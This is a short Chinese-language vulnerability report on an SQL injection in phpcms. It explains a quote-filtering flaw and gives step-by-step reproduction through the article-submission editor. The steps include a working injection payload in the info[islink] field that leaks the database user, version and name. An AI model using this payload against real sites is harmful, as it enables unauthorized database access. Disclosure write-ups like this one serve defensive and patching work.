phpcms最新版本SQL注入一枚

文章目录

漏洞作者: 路人甲

漏洞文件

过滤不单引号,由于GPC的关系,因此会留下 \ ,造成注入

漏洞利用证明:

开启投稿

1.首先随便提交一个文章,保存 点编辑,如图

011624255058d14b9dfa1b2c062128478ffc7aaf

 

2.进入编辑后,直接点击保存 ,然后抓包修改如下

0116245028a83257355db304ba8e23af1ca3957e

修改info[thumb]为:http://site’

修改info[islink]为:

,description=(select concat(user(),0x7c,version(),0x7c,database())) — s

最后确认。

再次进入编辑页面,可以看见注入的结果,如图:

01162530337ac6cfded468a378de48446c62606b

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录